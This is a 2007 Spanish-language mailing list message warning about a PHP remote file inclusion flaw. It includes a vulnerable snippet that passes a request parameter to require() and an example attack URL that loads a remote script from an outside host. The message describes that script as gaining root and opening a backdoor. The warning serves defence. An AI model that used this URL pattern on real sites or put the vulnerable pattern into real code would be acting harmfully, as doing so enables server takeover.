Alerta Vulnerabilidad en PHP - tener mucho cuidado

Miguel Oyarzo O. admin en aim.cl
Dom Ago 26 14:33:36 CLT 2007

At 14:10 26-08-2007, Rodrigo Fuentealba wrote:

>¿Es una vulnerabilidad de PHP o una vulnerabilidad programada en PHP?

PhP diria yo.
Por ejemplo.. los que tienen register_globals on
estan expuestos, siempre y cuando tengan script PHP q trataen a la variable
de error como un require.

Hay varios script PHP simples y complejos que traen pifias asi.

Si file send.php  es algo como:
<?if (isset($_GET['error'])) { require($_REQUEST["error"] );}?>

El atacante usara algo asi

http://elsitio.cl/sendmail.php?error=http://masterz.altervista.org/b

El shelcode, como mencionaba, se las arregla para obtener provilegios root,
abre una puerta y acepta
conexiones remotas. Ademas, el mismo script  al parecer agrega a otros
script PHP
la simple sentencia <?php ?> anterior (se preplica creo).

Saludos,

Miguel Oyarzo O.
Austro Internet S.A.
Punta Arenas